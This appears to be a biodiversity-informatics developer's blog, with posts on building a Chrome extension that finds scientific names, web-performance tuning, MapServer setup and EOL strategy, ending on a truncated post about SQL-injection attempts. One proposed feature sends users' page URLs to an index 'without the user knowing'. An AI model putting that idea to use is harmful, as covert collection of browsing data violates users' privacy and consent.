iSpiders

NameSpotter: Experiences Making a Google Chrome Extension

2013-07-01T11:15:00.000-06:00

If you believe various browser penetration statistics, Google Chrome is more popular than any other browser in use today. And, with the imminent demise of the popular iGoogle homepage later this year, my suspicion is that Chrome apps and extensions will grow in popularity...something is no doubt in the works in Mountain View. Many of these apps and extensions are freely available on the Chrome Web Store. Some time ago I decided to poke around and learn what it takes to develop a Google Chrome extension. I was pleasantly surprised at how easy it was. It's a good time to finally write about my experience, especially since I spent a few hours yesterday renewing an extension I designed called NameSpotter, whose code is on GitHub. The first part of this post is a description of what my NameSpotter extension does and the second part is cursory background to Chrome Extension authoring.

What Does the NameSpotter Extension Do?

The NameSpotter Chrome extension puts a Morpho butterfly icon in your browser toolbar. Click it and its wings start to flap while the content of the current web page under view is sent to the Global Names Recognition and Discovery web service where two scientific name-finding engines, TaxonFinder and NetiNeti take action. A list of scientific names returns and these are highlighted on the page. Run your cursor over a name and a tooltip draws-up content about that name from the Encyclopedia of Life. There's a resizable navigation panel that appears at the bottom of the page that allows you to jump your position on the page from name to name or to copy all or some of the found names into your clipboard for pasting elsewhere. Many of these features are customizable from a settings area in the navigation panel. For example, if you prefer not to have tooltips, you can turn those off.

The interface is in English or French, depending on your system settings. And, only common names (when known by EOL) in the language of your system settings are shown. If EOL had an API that accepted locale as a parameter, I'd use that too. As it stands, if your system settings are in French, you're going to get English content in your tooltips.

If you happend to be viewing a PDF while in Chrome and click the Morpho icon in your browser toolbar, you get a panel at the bottom of the page as usual but you don't get the tooltips. PDFs (sadly) are not HTML so there's nothing I can do to manipulate the static content you're reading.

There's quite a bit of action in this extension with many messages that get passed around from server to your browser and within the extension itself. I also made use of two very excellent jQuery plugins called Highlight and Tooltipster. The most difficult aspect to handle was making sure the extension performs well, especially when there might be hundreds if not thousands of names on the page. This is where a little knowledge about the performance of jQuery selectors comes in handy.

What's Next?

There are plenty of other aspects to this extension that could be explored such as:

Auto-indexing URLs and scientific names: Any click of the Morpho that results in found names could send the URL in the browser bar and the names found to an index without the user knowing. This would be equivalent to crowd-sourced web spidering. An aggregator of content like EOL might be very interested to receive URL + name combinations to make an auto-generating outlinks section.
Other sources of content in tooltips: I designed the tooltip to be (relatively) flexible. If there are other resources that accept a scientific name as a query parameter in a JSON-based RESTful API, I could wire-up its responses. If you are more interested in nomenclatural acts, I could for example use ZooBanks APIs. Or, I could send the namestring to CrossRef's API and pull back some recent publications. There's really no limit to sources of data. What's limiting is my appreciation what's useful in this framework.
Sending annotations to the host: This one's a bit half-baked, but why can't a Google Chrome extension be used to push annotations, questions, comments to the host website? You'd need a bit of OAuth and something on the web page to inform the extension that the host is willing to accept annotations and where to send them. Something like webhooks come to mind.

Do you have other suggestions?

How Do You Make a Chrome Extension?

Google Chrome extensions are remarkably simple, based solely on HTML, css and JavaScript, the basic tools of web page development. In contrast, FireFox and Internet Explorer extensions are horribly complex and their documentation for first-timers is equally terrible. The documentation for Chrome extensions is wonderful with plenty of tutorials and free samples. Development is made especially easy because you can load an "unpacked" extension, tweak it, reload it, and iterate with a few clicks from your Chrome extensions page while in developer mode.

Chrome extensions have three basic parts: 1) Metadata file, 2) Content scripts and, 3) Background pages/Event scripts and a very important construct: Passing Messages.

Parts of a Chrome Extension

Metadata File

The metadata file is a static JSON document called the Manifest and it contains basic information about the extension such as a title, description, default locale (language) as well as more complex concepts such as permissions and the local JavaScript and css files the extension will use. As I learned the hard way, you cannot put bits in your manifest (eg. configuration variables) that Google doesn't expect to see. So, if you have a need for configuration variables as I did, you have to do a bit of AJAX to grab the contents of your static file:


  nsbg.loadConfig = function() {

var self = this,
url = chrome.extension.getURL('/config.json');

$.ajax({
type : "GET",
async : false,
url : url,
success : function(data) {
self.config = $.parseJSON(data);
}
});

};

Content Script(s)

Content Scripts are the JavaScript and css files that you want injected into the web page. They run in the context of web pages, but are encapsulated in their own space. You cannot execute JavaScript functions that might already be declared in the source of a web page. Besides, how would an extension know that such a function could be executed? Nonetheless, if you need jQuery or any other library to write your content scripts, drop 'em in a folder in your extension and declare 'em in your manifest. It is that simple. Content scripts do however have access to the DOM of web pages. So, you can modify links, access the pictures, or any other content on the web page via your content script.

Background Page / Event Script(s)

Background pages do as their name suggests - they run in the background and don't require user interaction to do so. Event scripts are similar to background pages but are more friendly toward system resources because they can free memory when not needed. Why do you need background or event scripts? A good candidate for a background page is material for a user interface. Another important reason for background pages or event scripts is that these have capabilities that content scripts to do not, eg. access to the context menu or bookmarks. You don't always need a content script, but you always need a background page or event script. If you do have a content script, a good rule of thumb is to keep it mean and lean and dump the heavy lifting into a background or event script.

Passing Messages

This is the most difficult part of a Chrome extension, but powerful once you understand why it's needed. Background scripts have access to system-like functions that content scripts do not and content scripts respond to user interaction whereas background scripts (mostly) cannot. You bridge the two worlds by passing messages.

Here's a method in a content script that broadcasts a message:


chrome.extension.sendMessage(/* JSON message */, function(response) {

  //do something with response

});

...and the background/event script that listens for broadcasted messages and responds back.


chrome.extension.onMessage.addListener(function(request, sender, sendResponse) {

  //do something

  sendResponse(/* response body */);

});

I used the word "broadcast" because as you see from the above, there's nothing that indicates who sent the message or what it might contain. You avoid clashes with other installed modules that also use messages by constructing the body of your messages with care. In my case, I construct messages in my content scripts to contain the equivalent of a title in addition to a body so I know I'm the one who sent the message:


{ "message" : "ns_clipBoard", "content" : "my stuff" }

If EOL Started All Over Today, What Would be the Best Approach?

2012-12-07T21:17:00.000-07:00

Today I participated in a very engaging conversation with a group of systematists and ecologists who are intensely interested in cataloguing the diversity of life in their neck of the woods. They immediately recognized that such a compilation should contain authoritative content, it should contain links to relevant resources so as not to repeat efforts elsewhere, and it most definitely should be online. In my (perhaps naive) interpretation, it sounded much like the Encyclopedia of Life (EOL), albeit at a smaller, more focused scale.

But has EOL taken a winning approach? Has it sustained the interest it once had? Is it duplicating effort? Is it financially sustainable? Are remarkable, value-added products being built off its infrastructure that would not otherwise be possible? These aren't rhetorical questions. I just don't know. Shouldn't I know by now? Part of the answer will certainly depend on which metric you wish to use. And, these metrics will invariably draw upon the engagement of one audience or another.

Here's an interesting thought experiment:

If EOL had taken a radically different approach at the outset by becoming a taxonomically intelligent index (e.g. a Google-like product, but specifically tuned using a graph such as may be the eventual underpinnings of the Open Tree of Life) instead of serving species pages aggregated from elsewhere, where would it be today? What could have been built from such a "product"?

Conference Tweets in the Age of Information Overconsumption

2012-11-08T19:40:00.000-07:00

Having been a remote Twitter participant in what from all accounts was a successful conference hosted by the Entomological Society of Canada and the Entomological Society of Alberta, I have the luxury of now stepping back with a nice glass of red wine and thinking more deeply about the experience and its implications on the health of science. Dezene Huber has also taken a breath after he participated in person and provided valuable Tweet streams of his own.

The Saturday prior to the conference, I had a "wouldn't be cool if" moment and put my fingers to action on a toy that could listen in on the Tweet streams being generated by conference goers as they prepared for the event, as they were in transit, as they sat in the audience, as they chatted over coffee, and as they celebrated their winnings during the banquet.

My roughshod little experiment was to encourage participants to include scientific names in their streams. After all, names are a very important part of how biology is communicated. I grabbed their Tweets in real-time, fed them into three web services, and stored the results in a relational database. Two of these web services were developed by me and Dmitry Mozzherin at the Marine Biological Laboratory under the NSF-funded Global Names project led by David Patterson. These gave me the tools necessary to answer the questions, "Is this a name?" and "Where is this name in a classification?" The other web service I used was one recently assembled by some brilliant developers at CrossRef that figured out a way to execute rapid searches against their massive database of citations in the primary literature, assembled off the backs of researchers and publishers.

So, while "Ento-Tweeps" tapped a name, I immediately caught it, placed it in a hierarchy, and threw it to CrossRef. Within a split second after a Tweet appeared, I had links to the primary literature and I had some context. These were often amazingly accurate. Here's one that the prolific Morgan Jackson tweeted during Nikolai Tatarnic's paper entitled, "Sexual mimicry and paragenital divergence between sympatric species of traumatically inseminating plant bug":

Now that's useful!

However...

There were occasions where this wasn't so useful. These were examples of what some have called, "Information Overload". But that's a misnomer. We're beginning to understand what this really is. A better term for this (if one were to become dependent and fixated on streams like this) is "Information Overconsumption".

So, how do we responsibly integrate the power of social media in scientific conferences?

First, draft a light-hearted code of ethics - the same as we've become accustomed to with mobile phones at such events. Turn off the beeps and squawks! Turn off the unnecessary keypress chirps.

Second, as tempting as it may be, DO NOT COMMERCIALIZE THIS! The corporate sector has already found its way into the conference arena, the last pure outlet for the exchange of science. A social media outlet could be a new channel for communication that will be instantly switched off if it were behind a paywall.

Last, treat the messages not as news, but as products. Though the messages are instant, much like a stream of news, they are written by you, the one who has spent years honing your skills and learning your science.

My only hope is that "toys" like mine and the web services upon which they depend improve with time. They MUST help sell your products in a way that does not lead to Information Overconsumption and they MUST add value to the messages you wish to convey. How? That's up to you.

Science is a Product in the Wrong Marketplace

2012-01-03T22:58:00.003-07:00

Instead of mindlessly watching a movie tonight, I browsed through Google Tech Talks and stumbled upon a spectacularly argued, wonderfully cadenced, and orchestrated Sept 2011 presentation by Kristen Marhaver entitled, "Organizing the world's information by date and author is making Mother Earth Sick".

Her thesis is that science is a product, not a news stream. And, because science is communicated in a self-serving, pay-wall-laden marketplace, its products to outsiders (those who stand to benefit from this knowledge) are paradoxically valueless. Kristen argues that the first steps toward cracking into this marketplace could be to expose the inherently social dimension of science by using modern day social gadgetry. Google+, Twitter and star ratings could reside around the periphery of online PDF reprint viewers. Unfortunately Kristen, this is still the wrong marketplace.

The one place where the social dimension of science is abundantly obvious is the largely unchallenged scientific conference. There are ways for this energetic, youthful, exploratory dialogue to spill out onto the distant screens of those who could benefit. YouTube, Twitter, Google+ could all be used with religion at conferences because for the most part, papers delivered are free from the publisher's grasp. Google Tech Talks and TED talks are spectacularly popular for very good reason. The medium is accessible. Plus, there is ample opportunity to make conferences more accessible and engaging to registrants themselves. How many times have you heard someone deliver a paper who feels the need to introduce his/her co-authors who could not be present or to shamelessly advertise the upcoming paper/poster presentations of their graduate students? The moment someone walks up to the podium, I want all that pushed onto my iPad along with links to their reprints. I'd rather they just get on with it. If their presentation were recorded and later put on YouTube, I'd want the same experience. Sure, links to their reprints would likely throw me up against a brick pay-wall, but I'd already know and appreciate the context.

To take this even further, why not really expose the scientific conference by advertising the downtime? On how many occasions have you gone to a conference, only to share a beer or two in the evening(s) WITH THE COLLEAGUES YOU ALREADY WORK WITH!? Instead, I want a post-conference un-drink. That is, I'd like to advertise my desire to have a drink by posting what I'd like to talk about and then blast the venue into the Twittersphere for members of the public to join me if they felt so inclined. If it's a bust, I'll swallow my pride and go join another one...and I'll bring copies of my reprints.

Realtime Web

2011-11-14T10:05:00.003-07:00

I started work on a whimsical presentation I will soon give to the Biodiversity Informatics Group at the Marine Biological Laboratory about the Realtime Web and came-up with the following kooky slide. Felt the urge to share.

Amazing Web Site Optimizations: Priceless

2011-11-13T13:19:00.006-07:00

Quite literally, priceless. As in costs nothing.

I was obsessed with web site optimization these past few weeks, trying to trim off every bit of fat from page render times. As we all know, if a page takes longer than approx. 3-4 seconds to render, then you can expect to lose your audience. Even though expectations for speed vary depending on the end-user's geographic location, having a website that can be equally fast for a user in Beijing is just as important as the experience for a user in California. As might be expected, server hardware typically isn't the bottleneck. Another way of looking at this is to recognize that remarkable boosts in performance can be had on crap hardware. So, this post presents the tools I used to measure web site performance and describes the simple techniques I employed to trim the excess fat.

My drug of choice to measure the effect of every little (or major) tweak has been WebPagetest, a truly invaluable service because I can quickly see where in the world and why my web page suffered. Knowing that it took 'x' ms to download and render a JavaScript file or 'y' ms to do the same for a css file meant I could see with precision what a bit of js or css cleansing does to a user's perception of my web site. I also used Firebug and Yahoo's YSlow, both as FireFox plug-ins. Google Chrome also has a Page Speed extension that I used to produce a few optimized versions of graphics files.

Some tricks I employed to great effect, in order from most to least important:

Make css sprites. The easiest tool I found was the CSS Sprite Generator. Upload a zipped folder of icons and it spits out a download and a css file. Could it be any easier? Making a css sprite eliminates a ton of unnecessary HTTP requests and is by far the most important technique to slash load times.
Minify JavaScript and css. For the longest time, I was using the facile JavaScript Compressor, but the cut/paste workflow became too much of a pain. So, I elected to use some server-side code to do the same: jsmin-php and CssMin. When my page is first rendered, the composite js and css files are made in memory then saved to disk. Upon re-rendering (by anyone), the minified versions are served. Here's the PHP class I wrote that does this for me. Whenever I deploy new code, the cached files are deleted then recreated with a new MD5 hash as file titles.
Properly configured web server. This is especially important for a user's second, third+ visit. You'd be crazy not to take advantage of the fact that a client's browser can cache! I use Apache and here's what I have:

<Directory "/var/www/SimpleMappr">
Options -Indexes +FollowSymlinks +ExecCGI
AllowOverride None
Order allow,deny
Allow from all
DirectoryIndex index.php
FileETag MTime Size
<IfModule mod_expires.c>
<FilesMatch "\.(jpe?g|png|gif|js|css|ico|php|htm|html)$">
ExpiresActive On
ExpiresDefault "access plus 1 week"
</FilesMatch>
</IfModule>
</Directory>

Notice that I use the mod_expires module. I also set the FileETag to MTime Size, though this was marginally effective.
Include ALL JavaScript files just before the closing body tag. This boosts the potential for parallelism and the page can begin rendering before all the JavaScript has finished downloading.
Serve JavaScript libraries from a Content Delivery Network (CDN). I use jQuery and serve it from Google. Be weary that on average, it is best to ONLY have 4 external sites from which content will be drawn. This includes static content servers that might be a subdomain associated with your web site. Beyond 3 external domains or subdomains, DNS look-up times outweigh the benefit of parallelism, especially for aged versions of Internet Explorer. Modern browsers are capable of more simultaneous connections, but we cannot (yet) ignore IE. I once served jQueryUI via the Google CDN, but because this was yet another HTTP request, it was slower than had I served it from my own server. So, I now pull jQuery from the Google CDN and I include jQueryUI with my own JavaScript in a single minified file from from my server.
Use a Content Delivery Network. I use CloudFlare because it's free, was configured in 5 minutes and within a day, there was noticeable global improvement in web page speed as measured via WebPagetest. Because I regularly push new code, I use the CloudFlare API to flush their caches whenever I deploy. However, this is largely unnecessary because they do not cache HTML and as mentioned earlier, I make an MD5 hash as my js and css file titles.

So there you have it, I was able to trim 4-6 seconds from a very JavaScript-heavy web site. And, web page re-render speed is typically sub-second from most parts of the world. Because much of the content is proxied through CloudFlare, my little server barely breaks a sweat.

Did I mention that none of the above cost me anything?

SimpleMappr Embedded

2011-06-26T16:59:00.005-06:00

I never had high hopes for SimpleMappr. There are plenty of desktop applications to produce publication-quality point maps. But it turns out, users find these hard to use or are too rich for their pocket books. As a result, my little toy and its API are getting a fair amount of use. I find this greatly encouraging so I occasionally clean-up the code and add a few logical, unobtrusive options.

A number of users appear to want outputs for copy-paste on web pages and not copy-paste into manuscripts, so I just wrote an extension to permit embedding.

Here's one such example using the URL
http://www.simplemappr.net/?map=643&width=500&height=250:

Happy mapping...

Lightweight, Cross-platform, Real-time Browser-Browser Communications

2010-11-15T08:04:00.002-07:00

During a monthly meeting to discuss cutting edge technologies here at the Biodiversity Informatics Group at the Marine Biological Laboratory, I demonstrated a technique to update distributed browsers in the face of collaborative classification (i.e. tree) editing. In essence, if there are 2+ people asynchronously (i.e. via AJAX calls) updating content on a web page, there is potential for everyone to get horribly out of sync with one another. Imagine for example a chat window on a web page that does not update on everyone's web page in real time....wouldn't make for a particularly pleasant or useful experience for anyone. The same lousy experience was true in the LifeDesks tree editor when 2+ people were simultaneously updating the same classification. Person A might delete or move a node and person B, C, D, ... etc. are none the wiser and might later perform an action on that node (or its children) whereas the database no longer reflects what they see in their browser screen.

To work around the possibility that everyone editing can get horribly out of sync with one another, I implemented a polling mechanism to grab recent adjustments to data every 5 seconds. If you happen to be looking at a portion of the tree that someone else has just deleted or moved elsewhere in the tree, relevant nodes within the tree will now automagically refresh to reflect actions that someone else just did...nodes will flash red then disappear, nodes will flash green then appear, etc. There is also a scrolling activity monitor at the bottom of the screen. To be sure, this isn't a particularly robust mechanism because there is constant polling. Enter web sockets...

Ryan Schenk who attended this informal demonstration alerted me to Socket IO. I knew of it, but never paid much attention. However, after having poked around a little bit with the examples provided, I am convinced this is the way I should have designed real-time classification tree updates in the face of 2+ simultaneous user actions. The lightweight technique will prove useful for any client-client communications (e.g. real time chat). Plus, it has the excellent benefit of cross-browser, cross-platform capabilities with very little server strain. A database need only be hit once when person A exerts an action and the data propagates to all other users. Very cool.

MapServer, MapScript, MacPorts

2010-11-12T13:13:00.015-07:00

For anyone wishing to get into MapServer and serve shapefiles via PHP and also use a Mac with MacPorts for local development, here is how to compile. I discovered the hard way that the MacPorts port for MapServer is horribly dated and DOES NOT include PHP-MapScript. Compile instructions below assume you already have the php5 MacPort.

Install some dependencies if you haven't already got them:

sudo port install php5-gd
sudo port install xpm
sudo port install proj
sudo port install geos
sudo port install gdal

1. Download latest MapServer tarball, http://mapserver.org/download.html (e.g. at time of writing http://download.osgeo.org/mapserver/mapserver-5.6.5.tar.gz)
2. Extract and cd into folder
3. Execute from command line:

$ ./configure \
--prefix=/usr \
--with-agg \
--with-proj=/opt/local \
--with-geos=/opt/local/bin/geos-config \
--with-gdal=/opt/local/bin/gdal-config \
--with-threads \
--with-ogr \
--without-tiff \
--with-freetype=/opt/local \
--with-xpm=/opt/local \
--with-png=/opt/local \
--with-jpeg=/opt/local \
--with-gd=/opt/local \
--with-wfs \
--with-wcs \
--with-wmsclient \
--with-wfsclient \
--with-sos \
--with-fribidi-config \
--with-experimental-png \
--with-php=/opt/local

4. Execute from command line: $ make
5. Verify that mapserv is working by executing ./mapserv -v
6. Find php_mapscript.so in mapscripts/php3 and move to PHP extensions directory (usually /opt/local/lib/php/extensions/no-debug-non-zts-20090626/ for MacPorts). You may also need to add php_mapscript.so to your php.ini.
7. Move mapserv into cgi-bin folder for web server and give permission to execute if desire using it directly (optional)

If MacPorts's GDAL were similarly updated to v. 1.7.3, you could use GeoRSS data just as you would use shapefiles. But, alas, at the time of writing, the version in MacPorts is v. 1.6.2.

While we're on the mapping kick, here is a very excellent source of shapefiles: http://www.naturalearthdata.com/

...and a bit of PHP code to consume GeoRSS using the Magpie RSS library. The author uses some deprecated PHP functions in places, but it is nonetheless quite useful.

Reference Parser Revived

2010-08-21T11:54:00.017-06:00

Many moons ago, I once developed a tool that does real time discovery of scientific references using a combination of the aged (though still very useful) ParaTools and CrossRef's OpenURL service. With the demise of my server, this bit of code was lost. I just revived the code and functionality and provide it here for anyone else to take it and refine it UPDATE: parsing is now executed with a Ruby gem: http://refparser.shorthouse.net/. This location is not likely to persist so get it while you can. To get a sense of what it does, here are some verbatim references. Click the magnifying glass after each reference to experience the magic. Cross-domain AJAX requests are circumvented by using jQuery's clever JSONP handling.

Bell, C. D., & Patterson R. W. (2000). Molecular phylogeny and biogeography of Linanthus (Polemoniaceae). American Journal of Botany. 87, 1857-1870.

Epling, C., & Dobzhansky T. (1942). Genetics of natural populations. VI. Microgeographic races in Linanthus parryae. Genetics. 27, 317-332.

Epling, C., Lewis H., & Ball F. M. (1960). The Breeding Group and Seed Storage: A Study in Population Dynamics. Evolution. 14, 238-255.

Similarly, this can be done with an input box. Paste a reference and press enter:

Authentication Made Easy

2010-07-27T07:40:00.003-06:00

I am swamped by the number of user names and passwords I have to remember and, quite frankly, if a new resource I stumble upon requires me to remember yet another account for me to access or do something I need, it's a deterrent and I'll go elsewhere. While developing features for SimpleMappr, it occurred to me that users probably would like to save a template of a naked map and then populate it with various bits of data at various times. In other words, it would be handy to just draw-up a template and use it whenever creating something new. Rather than making yet another user account system (ugh!) for this map template saving tool, I made use of Janrain's (formerly RPX) OpenID system. In less than an hour, I made a 2-click user authentication system for users. While Janrain is a for-profit company, it's only a matter of time for an open-source equivalent at which time I can probably just switch and not have to adjust the database schema or much of my code.

SimpleMappr API

2010-04-05T08:06:00.006-06:00

There are plenty of resources to make pushpin maps, but none that I know of have a Microsoft Excel add-on to make use of these. My ultimate goal is to make one as part of SimpleMappr to help streamline map creation for assembly into manuscripts. To get a little closer to this vision, I spent a half-hour making a RESTful API and the documentation may be found here: http://www.simplemappr.net/#map-api.

For example, this URL: http://www.simplemappr.net/api/?file=http://www.simplemappr.net/public/files/demo.txt&shape=square&size=10&color=255,0,0&width=400&bbox=-130,40,-60,50&layers=lakes,stateprovinces&projection=esri:102009

Gives you this:

Mapping Revival

2010-03-25T19:25:00.004-06:00

One of the casualties of the death of the Nearctic Spider Database was a largely neglected, simple mapping application that permitted copy/paste of collection coordinates. The output was a b&w line map with contoured dots, mostly suitable for insertion in manuscripts. Sadly deficient was the ability to have many layers, each with different pushpin style or to crop, zoom, pan or change the projection. Unbeknown to me, folks were actually using this thing. I actually made a much better application for the AMNH to help produce outputs for their PBI grant holders. So, with Norm Platnick's permission, I re-purposed some of the code.

Here be SimpleMappr, http://www.simplemappr.net.

There are bound to be bugs or hiccups because it's never been fully tested under load, but I throw it out here for feedback and feature requests. Please let me know what you were doing when and if you witness odd behaviour; this is a very dynamic environment. Yes, there are similar sorts of applications out there in the wilds but none to my knowledge permit this sort of facile "copy/paste/tweak/export" as fast as this one can.

Nearctic Spider Database Dead

2010-03-19T10:20:00.005-06:00

With great sadness, I will no longer be serving the Nearctic Spider Database unless something remarkable happens.

On March 17, 2010, the power supply sparked in my server, shorted out the motherboard and as a consequence, the hard drives seized up. While I of course have back-ups, unbeknown to me the incremental drive image for the applications portion of the server was corrupt. The latest working drive image was January 2007 - hardly useful to rebuild the server. This means I have to reconstruct the server from bare metal, which would be a significant financial hit and a significant consumption of time away from family.

The website currently serves a flat html page where one may download the code and data until March 31, 2010 at which time it will evaporate.

I estimate it would take a solid week to re-install and iron-out the kinks. But, if it takes that long, surely it would be better to have a fool-proof system. And, in particular, one NOT dependent on Microsoft software.

The Community is Dead

2009-06-14T18:56:00.002-06:00

This may not be much of a relevation to many, but is a notion that is sinking home more deeply for me of late. By "Community", I don't necessarily mean the online community, though there are hints of that as well when you think of the MySpace->Facebook->Twitter progression from all-out friend fest to ever more insular & individualistic directions, I mean the taxonomic community.

I lead the LifeDesk application of the Encyclopedia of Life and have been trying to sell the notion of a taxa-centric "community" of taxonomists that have a desire to get their content online in a human and machine readable format. Banding together means the workload can be shared. i.e. you gather the images, I'll get the text, she'll get the names in order, and he'll get the bibliography, etc. etc. This is a similar approach behind the Scratchpad philosophy. [Aside: there are apparently some who think Scratchpads and LifeDesks are duplicating efforts, but nothing could be further from the truth. Having both means choice and that is a good thing because it strengthens both our directions and is a clear signal to taxonomists that there is something behind this.] While the Scratchpad/LifeDesk community-driven focus may work in a number of situations, it is by no means the rule. Rather, the chances are much greater that taxonomists don't have a taxa-centric community of colleagues to share the workload because in fact, they may be the only one in the world working on their chosen taxa. As a result, the majority of Scratchpads and LifeDesks will be "communities" of single individuals. So, I have been thinking a little more deeply about the Scratchpad/LifeDesk direction and think I see a way forward.

The clear signal from the Scratchpad/LifeDesks projects is that folks are doing primarily two things: 1) getting a biblio online, and 2) getting taxonomic names in order. These two activities are largely divorced from one another because the workflow leaves a lot to be desired. Both activities are thankless tasks to begin with regardless of the LifeDesks/Scratchpad environment, which adds further insult to the workflow. Why should these activities be so independent from one another? Here's what the workflow ought to be:

1. Upload PDF reprints
2. Look for a DOI & get the metadata from CrossRef. If none found, prompt with citation form (first check for existing paper in db to cut down on duplicates)
3. Scan the PDFs using TaxonFinder
4. Present flat lists of names found in individual PDFs
5. Drag these into jsTree-based classification manager while retaining the name-reprint link in the background

This is the workflow that makes sense because when building a classification, one necessarily starts with publications, not some mythical list of names.

But...

Does the above make sense in a LifeDesk or a Scratchpad? It could certainly be a cool tool to help lower the bar of entry, but I seriously doubt it would get the traction in the taxonomic "community" that the tool would deserve. Rather, the application is best placed on the desktop as a rich, cross-platform app in Adobe Air or similarly facile environment to develop. Roll in some Bittorrent capabilities (ee gads!) and you have the start to a mechanism whereby reprints, names AND classifications may be shared and one could walk among the three in various ways. It would work because taxonomists need reprints and names AND there are plenty of residual names in any one reprint (i.e. of use to someone else). If cleverly constructed, reconciliation of names is an insular exercise that happens on the desktop (as it always has been) but the sharing of these reconciliation groups / biblio metadata acts to enhance the findability of reprints.

Here's the challenge then. Build a service that accepts PDF reprints, finds the DOI (if present) & spits back the citation metadata for the article AND all the names (dedup'd and cleaned) they contain. I don't don't need any more taxonomic intelligence than that. Give it to me in JSON and I can whip up the jsTree-based interface to help individuals build their own reconciliation groups...all linked to reprints in their store.

Cooliris on Eight Legs

2008-12-18T22:37:00.004-07:00

For well over a year, I have been serving MediaRSS feeds from the Nearctic Spider Database (before Yahoo and Flickr!) and I am overjoyed to see that all the big guys are jumping on this extension to RSS 2.0. One in particular that blows me away is Cooliris, a plug-in for all modern browsers that allows one to navigate MediaRSS feeds in 3D. So, if you haven't yet downloaded and installed Cooliris, you may do so HERE. Then, you're welcome to see the feed of spiders HERE.

Maybe I better take a second look at RSSBus...

Little E's

2008-11-03T19:20:00.005-07:00

Because I work for the Encyclopedia of Life (EOL) and because I can tinker on the Nearctic Spider Database, I have the opportunity to try out various approaches to help mobilize data. One thing that concerns me about the current relationship between EOL and its content partners is their near 1:1 relationship. In other words, content partners that come onboard are encouraged to represent their data in one potentially massive XML document much like a Google Sitemap. More information on what EOL would like to see future content partners produce can be found HERE. A potential outside consumer of these data will have no idea where to retrieve this XML document. Thus, the relationship between EOL and its content partners is closed. That is, until EOL releases some web services.

So, in an effort to help expose the data structure EOL is looking for, I made a link on every one of the species pages in the Nearctic Spider Database. Upon clicking these "little e's", you can catch a glimpse of what EOL is hoping its content partners will produce. These "little e's" don't really help the relationship between EOL and its array of content partners, nor does it ease the effort on the part of content partners to make these documents, and nor does it help us at EOL. So what's the point? What it does is share what I produced for EOL. If you can parse the data behind the "little e's", you can parse the big XML "sitemap" document I made for EOL as well.

The problem with sitemaps is that no one but the harvester knows where these sitemaps can be found. A Google sitemap for instance can be found in any folder on a website that shares a sitemap (but is usually in the root folder and is accessed as /sitemap.xml or /sitemap.gz). This is the same situation for EOL and its content partners; the "sitemap" can be found anywhere.

To finish off the "little e" approach, each page should have a link to the EOL content partner sitemap document in which can be found links to all pages with "little e's". This would be somewhat similar to an OpenSearch document where are found instructions on how to make use of the search feed(s) available on a site. And of course, there should be a JSON option for a lighter weight option than XML.

But, to make this of any use at all, we need a desktop reader like an RSS reader...something with the ability to shunt the data into the correct spot within a rich GUI-based classification (with some degree of certainty), thus forcing us to eventually develop far better online tree browsers. With all the bits described above, you'd come across a species page, click a button like an RSS feed button, download a sitemap containing a list of all species pages on the site you landed on, then browse through the content the way you want it organized.

Google Charts...Wow

2008-10-18T19:35:00.002-06:00

Kevin Pfeiffer, an avid participant in the Nearctic Arachnologists' Forum, finally got me to do something about the Flash-based charts on the species pages in the Nearctic Spider Database. While these older charts were great at the time, they've had their day. So, in light of the sparklines that Rod Page integrated into a "Biodiversity Service Status" pinger, I thought I'd take a closer look at Google Charts. Wow. The added plus for this service is the truly stellar documentation.

Rather than using a terribly long URL to get the PNG for the chart, I used a proxy. This way, I can pass the identifier to a local script that then grabs the image and dumps it on the page. And, I can give the chart a file name of my choosing.

Long Tail of Biodiversity

2008-10-12T07:57:00.003-06:00

At last count on the World Spider Catalog, there are 4345 species in the spider family Linyphiidae. This is second only to the jumping spiders. The latter are primarily tropical and subtropical, but linyphiids are predominantly found in the northern hemisphere, where are coincidentally found most of the world's arachnid systematists. And, of course, there's very little accessible information on most of these species either in print or on the web. A few notable exceptions are Tanasevitch's Linypiid Spiders of the World, which contains flat lists of names organized in various ways and the ever popular BugGuide gallery (few of which identified to species). There is a smattering of other resources out there, but they are all hard to find. Both the Tree of Life and the Encyclopedia of Life have the equivalent of stub pages so neither of these are particularly helpful.

A recent unlocking of these hidden gems is underway by Nina Sandlin, an Associate of Zoology at the Field Museum in Chicago. She has been building LinEpig, an photo gallery of linyphiid epigyna on Picasa Web Albums. Like most other online work on arachnids, LinEpig is built with love for the organisms and no budget (correct me if I'm wrong Nina!). While taking images of the epigyna, Nina graciously shared the habitus images with the Nearctic Spider Database. While in Chicago recently, I chatted with Nina about Picasa. While it comes close to what she wanted, it fell short in a number of areas. The most important in my opinion is findability. Sure, she can tag her images with names, but her gallery is poorly exposed on Google and other search engines. However, there are some features in Picasa that make it attractive. It is relatively easy to upload, manage, and geotag - though the latter could evidently use text boxes if one already has coordinates on hand. Most importantly, the interface is clean, responsive and uncluttered.

Now the long tail...

Prior to Nina's efforts, there was very little (if any) linyphiid imagery on the web, especially the specialized images of the epigyna, which are a lot more useful than the habitus images. If you've seen one linyphiid, you've pretty much seen them all (a few exceptions of course). They are remarkably similar in shape & size, but their sexual characters, especially the male's, are dramatically different. The big biodiversity aggregators like the Encyclopedia of Life have positioned themselves to present low hanging fruit. That is, show the furry charismatic megafauna (or fish) because there are many resources serving this sort of content. But, why? Wouldn't it make sense to instead provide better and more useful tools for folks like Nina to create and organize content for which there is either nothing or very little available elsewhere? Let's hope that in time, LifeDesk will provide a ladder for consumers of content generated there to reach out to the furthest branches and leaves where are found all the curiosities. But first, it'll have to contain tools and functionality useful for folks like Nina and for others to jump in and give her a hand.

Show Me...Crab Spiders on Bark

2008-07-25T18:55:00.003-06:00

One of the DarwinCore elements for specimen and observation data is "habitat". To my knowledge, not a lot has been done with these data. Either there are actually few records cached at GBIF that have this field filled or the data are in a such a mess as to be (mostly) unusable. I certainly hope it's not the latter. No matter how messy, there is still a wealth of information here if one takes the time to sift through it. The data are not unlike folksonomies and someone with more patience than me could probably develop a natural classification of these terms.

Faceted search is a first crack at making these data useful, because there is certainly more trajectories into the data than without making use of the data. For a first cut at this, I pulled 30 random contributed specimen records in the Nearctic Spider Database for each species and merely display the full contents on the species pages. Then, I index the pages as always using my trusty Zoom Search. Voila, a quick way to do some quick, faceted searches. It's not perfect, but it's better than nothing. Where "crab spider bark" or "wolf spider beach" once produced no search results, there are now 5 and 17 results returned, respectively. Incidentally, Flickr produced 13 and 18 results, respectively but many images are useless.

Green Porno

2008-07-20T22:08:00.002-06:00

I couldn't resist sharing these. Pure genius. Kudos to Isabella Rossellini.

SQL Injection Attacks!

2008-07-20T15:09:00.006-06:00

I was browsing through my web logs this morning and discovered some clever attempts to hack into my database using a technique called SQL injection. Here's a portion of one line in the web log:
